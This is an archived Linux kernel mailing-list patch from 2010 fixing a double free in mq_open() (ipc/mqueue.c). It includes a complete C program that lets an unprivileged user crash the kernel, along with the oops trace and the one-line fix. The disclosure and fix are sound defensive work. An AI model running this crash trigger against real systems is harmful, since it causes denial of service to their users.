| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Sun, 9 May 2010 06:22:28 -0300
From: André Goddard Rosa <andre.goddard@...il.com>
To: Al Viro <viro@...iv.linux.org.uk>,
Andrew Morton <akpm@...ux-foundation.org>,
Alexey Dobriyan <adobriyan@...il.com>,
Sanchin Sant <sanchinp@...ibm.com>,
linux-kernel@...r.kernel.org
Cc: André Goddard Rosa <andre.goddard@...il.com>
Subject: [PATCH] mqueue: fix kernel BUG caused by double free() on mq_open()
In case of aborting because we reach the maximum amount of memory
which can be allocated to message queues per user (RLIMIT_MSGQUEUE),
we would try to free the message area twice when bailing out.
It can be triggered by any unprivileged user with the following program:
/*
* This program causes a Linux kernel BUG by any unprivileged user.
* Compile and run it with:
* $ gcc main_mqueue_BUG.c -lrt; ./a.out
*/
#include <stdio.h>
#include <stdlib.h>
#include <mqueue.h>
#include <string.h>
#include <sys/time.h>
#include <sys/stat.h>
#include <sys/resource.h>
#define MAX_TRIES 32
#define NAMESIZE 32
#define NEW_MQ_MEM_LIMIT 16384
#define BUFFER 8192
#define MAXMSG 10
#define MQUEUE_NAME_PATTERN "/main_mqueue_BUG_%d"
int main()
{
char qname[NAMESIZE];
struct mq_attr attr;
struct rlimit new_rlimit;
int i = 0;
new_rlimit.rlim_cur = NEW_MQ_MEM_LIMIT;
new_rlimit.rlim_max = NEW_MQ_MEM_LIMIT;
if (setrlimit(RLIMIT_MSGQUEUE, &new_rlimit) != 0) {
perror("Failed BUG exploit! setrlimit() didn't return success");
return EXIT_FAILURE;
}
attr.mq_msgsize = BUFFER;
attr.mq_maxmsg = MAXMSG;
do {
snprintf(qname, sizeof(qname), MQUEUE_NAME_PATTERN, i);
/* We're leaking the userspace fd (and kernel memory) here on purpose... */
if (mq_open(qname, O_CREAT |O_RDWR, S_IRUSR | S_IWUSR, &attr) == (mqd_t)-1)
perror("Did we BUG already? mq_open() didn't return success");
} while (++i < MAX_TRIES);
printf("%s\n", "If the BUG didn't happen yet, it should happen real soon... Check dmesg!");
return EXIT_SUCCESS;
}
BUG listing:
------------
kernel BUG at mm/slub.c:2846!
invalid opcode: 0000 [#1] PREEMPT SMP
last sysfs file: /sys/devices/system/cpu/cpu1/cache/index2/shared_cpu_map
CPU 0
Modules linked in: nfs lockd nfs_acl auth_rpcgss sunrpc vboxnetadp vboxnetflt vboxdrv af_packet snd_pcm_oss snd_mixer_oss snd_seq snd_seq_device edd ipv6 cpufreq_conservative cpufreq_userspace cpufreq_powersave acpi_cpufreq binfmt_misc fuse loop arc4 snd_hda_codec_idt ecb iwl3945 snd_hda_intel iwlcore snd_hda_codec uvcvideo snd_hwdep snd_pcm videodev mac80211 snd_timer v4l1_compat snd v4l2_compat_ioctl32 i2c_i801 ide_cd_mod cfg80211 soundcore video sony_laptop snd_page_alloc rfkill i2c_core cdrom output sg joydev serio_raw pcspkr ac battery button usbhid hid sd_mod uhci_hcd ahci libata rtc_cmos rtc_core rtc_lib scsi_mod ehci_hcd usbcore fan processor piix ide_core thermal thermal_sys hwmon
Pid: 2743, comm: a.out Not tainted 2.6.34-rc7-3.2-default #252 VAIO/VGN-FZ15L
RIP: 0010:[<ffffffff810c94d1>] [<ffffffff810c94d1>] kfree+0xa1/0xb0
RSP: 0018:ffff880073321dc8 EFLAGS: 00010246
RAX: ffffea000191ca00 RBX: ffff880073150708 RCX: ffff8800731503a8
RDX: 4000000000080000 RSI: ffffffff81609520 RDI: ffff880072cc0000
RBP: ffff880072cc0000 R08: 00000000000004c0 R09: 0000000000000001
R10: ffff880001622550 R11: ffff880073150700 R12: ffff880073150708
R13: ffffffff814f84e0 R14: 00000000000fde80 R15: ffff880073150700
FS: 00007fd6845616f0(0000) GS:ffff880001800000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 00007fd684194fe0 CR3: 000000007e0a4000 CR4: 00000000000006f0
DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400
Process a.out (pid: 2743, threadinfo ffff880073320000, task ffff88007dd5f800)
Stack:
0000000000000040 ffff880073150708 ffff880073150700 ffffffff811e0012
<0> ffff880073150708 ffffffff813cb200 ffffffff814f0820 0000000000124f80
<0> 00000000000fde80 ffffffff810e47ec ffff880073150708 0000000000000000
Call Trace:
[<ffffffff811e0012>] ? mqueue_delete_inode+0x92/0x120
[<ffffffff810e47ec>] ? generic_delete_inode+0x8c/0x130
[<ffffffff811e0322>] ? mqueue_get_inode+0x282/0x290
[<ffffffff811e0430>] ? mqueue_create+0x90/0x190
[<ffffffff810d8eec>] ? vfs_create+0xac/0xd0
[<ffffffff811e0ae2>] ? sys_mq_open+0x5b2/0x710
[<ffffffff81002eab>] ? system_call_fastpath+0x16/0x1b
Code: 5d c3 48 89 ea 48 89 c6 e8 ed fa ff ff eb ea 66 f7 c2 00 c0 74 15 41 5b 48 89 c7 5b 5d e9 c8 75 fd ff 48 8b 40 10 48 8b 10 eb 90 <0f> 0b eb fe 66 66 2e 0f 1f 84 00 00 00 00 00 48 83 ec 08 48 81
Signed-off-by: André Goddard Rosa <andre.goddard@...il.com>
---
ipc/mqueue.c | 1 +
1 files changed, 1 insertions(+), 0 deletions(-)
diff --git a/ipc/mqueue.c b/ipc/mqueue.c
index 722b013..77a3c8e 100644
--- a/ipc/mqueue.c
+++ b/ipc/mqueue.c
@@ -159,6 +159,7 @@ static struct inode *mqueue_get_inode(struct super_block *sb,
task_rlimit(p, RLIMIT_MSGQUEUE)) {
spin_unlock(&mq_lock);
kfree(info->messages);
+ info->messages = NULL;
goto out_inode;
}
u->mq_bytes += mq_bytes;
--
1.7.1.78.g212f0
--
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majordomo@...r.kernel.org
More majordomo info at http://vger.kernel.org/majordomo-info.html
Please read the FAQ at http://www.tux.org/lkml/
Powered by blists - more mailing lists